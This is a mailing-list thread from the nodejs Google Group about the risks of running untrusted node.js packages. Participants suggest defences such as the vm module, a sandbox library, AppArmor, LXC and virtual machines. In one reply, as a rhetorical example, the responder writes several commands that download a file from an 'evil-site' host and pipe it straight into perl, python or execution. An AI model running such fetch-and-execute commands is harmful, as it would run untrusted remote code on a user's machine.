17.12.2013, 15:07, "Alexander" <alexo...@gmail.com>: > Thank you for the reply. > Why security implications of running node.js are not related to node.js, > is hard to understand? (can you give reason)?
If you run "wget http://evil-site/virus.pl -O - | perl", is it related to perl? Is it a vulnerability in perl? If you run "wget http://evil-site/virus.py -O - | python", is it related to python? Is it a vulnerability in python? What happens if you run "wget http://evil-site/virus && ./virus"? > While I agree for other reasons maybe to your suggestions (i.e. I can > see reasons to not use Windows (which is really unrelated to node.js) > > I am telling you, that it would be nice to have the chance to savely > run untrusted code. As I said, you can do in a virtual machine. > For me that would be related a big deal to node.js because to savely > or "relatively more savely" run untrusted code would require to be > able to reduce the priveleges and access-rights and permissions of > what the untrusted code can do. > For example some code should not be able to touch "fs" kind of funcitons. > Such an sandboxing would have to happen inside node.js (that is why I ask > in this list). Oh well yeah, here is some helpful sandboxing stuff: http://nodejs.org/api/vm.html > Also there have been efforts (maybe they are good) > > https://github.com/gf3/sandbox > (I think it generates a way to reduce the priviledges of untrusted code, by > spawing a child process which lacks access to global...). I am not sure > how it works > in detail (maybe somebody can tell). This could help with cases as > suggested in the > examples.js section. It forks node.js and creates a new empty context in the child process. Yes, that would work. > > There have been efforts > https://github.com/gf3/sandbox/blob/master/example/example.js > > Some remarks still to the "Do not use windows". If meant Microsoft stuff > (window is > in Javascript context somewhat a ambigious term) then I can only suggest > that > Linux would not be much safer. Really linux distributions are overrated > in terms of savefty. In linux it is hard to work under root. In windows it's hard to NOT work under root. That's all there is. I'm not even mentioning capabilities and containers. > Just by running one would not suddenly reduce risks of running > untrursted code in > node.js. > Anyway with appArmor it can be done to limit node.js access. If there is > a profile > that would help everybody that runs node.js in Ubuntu systems. Which > like it or > not is a common linux distribution. > > Thanks Alex > > On 12/17/2013 11:56 AM, Alex Kocharin wrote: > >> It has nothing to do with node.js. >> >> And actually it is very simple: >> >> 1. Do not run untrusted code. >> 2. Do not use windows. >> >> If you have to run something you don't trust, LXC is suggested. But >> again, it has nothing to do with node.js in particular, and it's true >> for almost all programs out there. >> >> 17.12.2013, 14:47, "ofencito" <alexo...@gmail.com>: >>> Dear all, >>> I really like node.js. Great to have JS also in the command line. >>> Only worry I have is security. >>> >>> there is for example this https://github.com/hacksparrow/virus >>> >>> Let's us be honest. Once installed node.js we like to extend its >>> utitlity, installing packages. >>> Not all we do a thorough code autid before. Consequently I am worried >>> what would happen >>> if the "untrusted" code I run would do harm to my system. >>> This is already a concern in Browsers (and greatly motivates people >>> to use NoScript etc.) >>> >>> How have you guys managed to protect your system from node.js? >>> basically it should be somewhat protected (if run in linux) since you >>> most likely run it your >>> user account. Better even you could run it as an unpriveliged user >>> (suggestion 1). >>> Still I see much potential to provoke havoc and chaos.... >>> with all its powers... node.js resamples an open door to the system >>> (which it really actually >>> should be, with exception to untrusted code). >>> >>> For those who know it. Do you have Apparmor profile that restricts >>> the stuff that node.js >>> can do on your PC? if so can you share? >>> Do you run node.js in a virtual container/machine? >>> How to you protect your stuff in node.js form other stuff in node.js? >>> >>> Thanks for your insights >>> >>> -- >>> -- >>> Job Board: http://jobs.nodejs.org/ >>> Posting guidelines: >>> https://github.com/joyent/node/wiki/Mailing-List-Posting-Guidelines >>> You received this message because you are subscribed to the Google >>> Groups "nodejs" group. >>> To post to this group, send email to nodejs@googlegroups.com >>> <mailto:nodejs@googlegroups.com> >>> To unsubscribe from this group, send email to >>> nodejs+unsubscr...@googlegroups.com >>> <mailto:nodejs+unsubscr...@googlegroups.com> >>> For more options, visit this group at >>> http://groups.google.com/group/nodejs?hl=en?hl=en >>> >>> --- >>> You received this message because you are subscribed to the Google >>> Groups "nodejs" group. >>> To unsubscribe from this group and stop receiving emails from it, >>> send an email to nodejs+unsubscr...@googlegroups.com >>> <mailto:nodejs+unsubscr...@googlegroups.com>. >>> For more options, visit https://groups.google.com/groups/opt_out. >> -- >> -- >> Job Board: http://jobs.nodejs.org/ >> Posting guidelines: >> https://github.com/joyent/node/wiki/Mailing-List-Posting-Guidelines >> You received this message because you are subscribed to the Google >> Groups "nodejs" group. >> To post to this group, send email to nodejs@googlegroups.com >> To unsubscribe from this group, send email to >> nodejs+unsubscr...@googlegroups.com >> For more options, visit this group at >> http://groups.google.com/group/nodejs?hl=en?hl=en >> >> --- >> You received this message because you are subscribed to a topic in the >> Google Groups "nodejs" group. >> To unsubscribe from this topic, visit >> https://groups.google.com/d/topic/nodejs/Xp0CJxuJr2A/unsubscribe. >> To unsubscribe from this group and all its topics, send an email to >> nodejs+unsubscr...@googlegroups.com. >> For more options, visit https://groups.google.com/groups/opt_out. > > -- > -- > Job Board: http://jobs.nodejs.org/ > Posting guidelines: > https://github.com/joyent/node/wiki/Mailing-List-Posting-Guidelines > You received this message because you are subscribed to the Google > Groups "nodejs" group. > To post to this group, send email to nodejs@googlegroups.com > To unsubscribe from this group, send email to > nodejs+unsubscr...@googlegroups.com > For more options, visit this group at > http://groups.google.com/group/nodejs?hl=en?hl=en > > --- > You received this message because you are subscribed to the Google Groups > "nodejs" group. > To unsubscribe from this group and stop receiving emails from it, send an > email to nodejs+unsubscr...@googlegroups.com. > For more options, visit https://groups.google.com/groups/opt_out. -- -- Job Board: http://jobs.nodejs.org/ Posting guidelines: https://github.com/joyent/node/wiki/Mailing-List-Posting-Guidelines You received this message because you are subscribed to the Google Groups "nodejs" group. To post to this group, send email to nodejs@googlegroups.com To unsubscribe from this group, send email to nodejs+unsubscr...@googlegroups.com For more options, visit this group at http://groups.google.com/group/nodejs?hl=en?hl=en --- You received this message because you are subscribed to the Google Groups "nodejs" group. To unsubscribe from this group and stop receiving emails from it, send an email to nodejs+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/groups/opt_out.
